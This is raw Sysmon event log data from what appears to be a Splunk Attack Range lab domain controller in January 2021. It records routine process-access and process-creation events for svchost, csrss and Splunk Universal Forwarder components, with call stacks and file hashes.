13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-445E-6000-1601-000000009A01}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.430{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445E-6000-1601-000000009A01}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:18.431{08A6967A-445E-6000-1601-000000009A01}4880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.259{08A6967A-445F-6000-1701-000000009A01}35404692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-445F-6000-1701-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-445F-6000-1701-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.102{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-445F-6000-1701-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:19.103{08A6967A-445F-6000-1701-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4460-6000-1801-000000009A01}1616C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:17:20.196{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 